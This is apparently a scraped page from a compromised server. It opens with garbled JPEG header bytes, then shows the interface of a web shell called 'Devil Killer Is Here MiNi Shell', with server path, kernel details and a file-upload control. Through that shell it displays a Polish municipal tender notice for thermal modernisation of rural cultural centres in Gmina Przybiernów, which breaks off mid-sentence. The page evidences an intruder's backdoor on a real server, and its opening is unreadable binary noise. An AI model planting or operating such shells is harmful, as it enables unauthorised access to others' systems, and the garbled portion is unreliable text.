JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250210/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250210/0009688901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PRZYBIERNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684344</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cisowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przybiernów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">914667530</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">914186622</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przybiernow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przybiernow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-178cc6c4-9182-441b-bc90-9e3267642ea4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00096889</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00055877/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Poprawa stanu bazy kulturalno-rekreacyjnej w Gminie Przybiernów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przybiernow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przybiernow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1 Komunikacja w postępowaniu o<br/>udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020 r. poz. 344).<br/>8.2 W postępowaniu o udzielenie zamówienia ofertę, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki<br/>dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym bądź kwalifikowanym podpisem<br/>elektronicznym.<br/>8.3 Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim przy użyciu Platformy Przetargowej Gminy<br/>Przybiernów: https://przybiernow.logintrade.net/rejestracja/ustawowe.html<br/>8.4 Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż określony w SWZ.<br/>8.5 Zamawiający informuje, iż wszelka korespondencja dotycząca niniejszego postępowania (pomiędzy zamawiającym a<br/>wykonawcami) będzie odbywała się za pośrednictwem Platformy Przetargowej Gminy Przybiernów :<br/>https://przybiernow.logintrade.net/rejestracja/ustawowe.html<br/>8.6 Zamawiający nie ponosi odpowiedzialności za złożenie przez Wykonawcę oferty w sposób niezgodny z instrukcją korzystania z<br/>www.logintrade.pl w szczególności za sytuację, gdy oferta nie zostanie złożona w miejscu wskazanym przez platformę określoną w<br/>punkcie 8.3 SWZ. Nieprawidłowe złożenie oferty skutkować będzie nieuwzględnieniem jej w prowadzonym postępowaniu.<br/>8.7 Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej<br/>Gminy Przybiernów: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na<br/>zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>8.8 Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń<br/>oraz informacji przekazywanych przy użyciu Platformy Przetargowej Gminy Przybiernów:<br/>1) dopuszczalne przeglądarki internetowe:<br/>• Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11<br/>• Google Chrome 31<br/>• Mozilla Firefox 26<br/>• Opera 18<br/>2) pozostałe wymagania techniczne:<br/>• dostęp do sieci Internet<br/>• obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax<br/>• włączona obsługa JavaScript<br/>• zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>• zainstalowany Acrobat Reader<br/>• zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>3) Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach<br/>danych określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz.<br/>2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">38.1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy,<br/>że:<br/>1) Administratorem danych osobowych Wykonawcy jest Wójt Gminy Przybiernów. Siedzibą wójta gminy jest Urząd Gminy w<br/>Przybiernowie, ul. Cisowa 3, 72-110 Przybiernów. Kontakt: osobisty w siedzibie urzędu, telefoniczny: +48 914186451 lub drogą<br/>elektroniczną na adres e-mail: sekretariat@przybiernow.pl<br/>2) W sprawach związanych z danymi osobowymi Wykonawca może kontaktować się z Inspektorem Ochrony Danych Osobowych,<br/>którym jest pan Bartosz Kaniuk, poprzez adres email: bkaniuk@proinspektor.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach:<br/>Część nr 1 – Termomodernizacja ośrodków kultury w m. Moracz, Brzozowo, Czarnogłowy i zmiana sposobu użytkowania budynku<br/>hydroforni na świetlicę wiejską w Rokicie,<br/>Część nr 2 – Budowa świetlicy kontenerowej w Łoźnicy,<br/>Część nr 3 - nadzór inwestorski.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj. Dz. U. z 2023 r. poz. 1605 ze zm.), dalej<br/>„ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele<br/>archiwalne- zgodnie z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat)<br/>natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres<br/>przechowywania 10 lat);<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/>przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GPB.271.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest realizacja zadania prowadzonego pod nazwą: Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach: Część nr 1 – Termomodernizacja ośrodków kultury w m. Moracz, Brzozowo, Czarnogłowy i zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie<br/><br/>5.2.	w tym wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ oraz projektowanymi postanowieniami umowy w sprawie zamówienia publicznego.<br/><br/>5.3.	Zamówienie jest realizowane w częściach, na które wykonawca może złożyć osobne oferty. Dla potrzeb porządkowych każda z części będzie nosić nazwy:<br/><br/>1)	Część nr 1 – <br/>Poprawa stanu bazy kulturalno-turystycznej w Gminie Przybiernów realizowana w częściach: Część nr 1 – Termomodernizacja ośrodków kultury w m. Moracz, Brzozowo, Czarnogłowy i zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie<br/><br/>Oznaczenie CPV:<br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>45111000-8 Roboty w zakresie burzenia<br/>45223500-1 Konstrukcje z betonu<br/>45320000-6 Roboty izolacyjne<br/>45261100-5 Wykonywanie konstrukcji dachowych<br/>45261210-9 Wykonanie pokryć dachowych<br/>45410000-4 Tynkowanie<br/>45440000-3 Roboty malarskie<br/>45431000-7 Kładzenie płytek<br/>45431200-9 Kładzenie glazury<br/>45421000-4 Roboty w zakresie stolarki budowlanej<br/>45443000-4 Roboty elewacyjne<br/>45233200-1 Roboty w zakresie rożnych nawierzchni<br/>45332000-3 Roboty instalacyjne wodne i kanalizacyjne<br/><br/>45000000-7 Roboty budowlane<br/>45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych<br/>45443000-4 Roboty elewacyjne<br/>45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne<br/><br/>Termomodernizacja Gminnego Ośrodka Kultury w Czarnogłowach<br/>Obiekt objęty opracowaniem to budynek Gminnego Ośrodka Kultury w miejscowości Czarnogłowy.<br/>Obiekt zlokalizowany jest w centralnej części wsi Czarnogłowy pod adresem ul. Fabryczna 28, Czarnogłowy, powiat goleniowski, gmina Przybiernów, woj. zachodniopomorskie, na działce ewidencyjnej nr 259/2.<br/>Zakres prac remontowo-budowlanych obejmuje montaż izolacji cieplnej na ścianach zewnętrznych<br/>budynku oraz na ścianie pomiędzy remizą strażacką a salą nr 0.9.<br/>Według art. 29 ust. 3 pkt 1e, nie wymaga decyzji o pozwoleniu na budowę, natomiast wymaga zgłoszenia, o którym mowa w art. 30, wykonywanie robót budowlanych polegających na dociepleniu<br/>budynków o wysokości powyżej 12 m i nie wyższych niż 25 m, w którym to przedziale znajduje się<br/>opracowywany obiekt.<br/><br/>Termomodernizacja Gminnego Ośrodka Kultury w Brzozowie<br/>Obiekt objęty termomodernizacją to budynek świetlicy wiejskiej w miejscowości Brzozowo. Obiekt<br/>zlokalizowany jest w północnej części wsi Brzozowo pod numerem 34A, powiat goleniowski, gmina<br/>Przybiernów, woj. zachodniopomorskie, na działce ewidencyjnej nr 14/8.<br/>Zakres prac remontowo-budowlanych obejmuje montaż izolacji cieplnej na ścianach zewnętrznych<br/>budynku oraz na nawisie nad głównym wejściem do budynku.<br/>Według art. 29 ust. 4 pkt 1c, nie wymaga decyzji o pozwoleniu na budowę, oraz zgłoszenia, o którym mowa w art. 30, wykonywanie robót budowlanych polegających na dociepleniu budynków o wysokości nieprzekraczającej 12 m, do których zalicza się opracowywany obiekt.<br/><br/>Termomodernizacja Gminnego Ośrodka Kultury w Moraczu<br/>Obszar objęty opracowaniem to fragment budynku mieszkalno-użytkowego, o funkcji świetlicy wiejskiej w miejscowości Moracz. Obiekt zlokalizowany jest w centralnej części wsi Moracz pod numerem 7, powiat goleniowski, gmina Przybiernów, woj. zachodniopomorskie, na działce ewidencyjnej nr 113/2.<br/>Zakres prac remontowo-budowlanych obejmuje montaż izolacji cieplnej na ścianach zewnętrznych<br/>budynku. Według art. 29 ust. 4 pkt 1c, nie wymaga decyzji o pozwoleniu na budowę, oraz zgłoszenia, o którym mowa w art. 30, wykonywanie robót budowlanych polegających na dociepleniu budynków o wysokości nieprzekraczającej 12 m, do których zalicza się opracowywany obiekt.<br/><br/><br/>Zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie<br/>Przedmiotem inwestycji jest zmiana sposobu użytkowania budynku byłej hydroforni, powstałego w 1973 roku, na wiejską świetlicę środowiskową. Inwestycja zlokalizowana jest na działce nr 39/1, obr. geod. Rokita, gm. Przybiernów.<br/>Wysokość, szerokość i wszelkie gabaryty zewnętrzne budynku pozostają bez zmian.<br/>Prace będą wykonywane głównie wewnątrz budynku – wymiana drzwi, szpachlowanie ścian, instalacja elektryczna, wymiana okien, postawienie ścianki działowej.<br/><br/>Uwaga! Projekt został pomniejszony o część ujętą w poprzednim postępowaniu tj. zagospodarowanie terenu, które jest opisane w projekcie, ale zostało usunięte z zakresu tego postępowania. Przedmiar został pomniejszony o odpowiednie pozycje. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45431200-9 - Kładzenie glazury</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla Części nr 1<br/>1) cena oferty (C) 60% 60 punktów<br/>2) wydłużenie okresu gwarancji i rękojmi (G) 40% 40 punktów<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.<br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/>ad. 1) Sposób obliczenia punktów dla kryterium cena oferty (C):<br/>W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/>Cmin<br/>Wartość punktowa „C” = -------------------------------- x Max(C)<br/>Cbad<br/>gdzie:<br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium.<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość<br/>punktów.<br/>Ad 2) Sposób obliczenia punktów dla kryterium wydłużenie okresu gwarancji i rękojmi (G):<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku 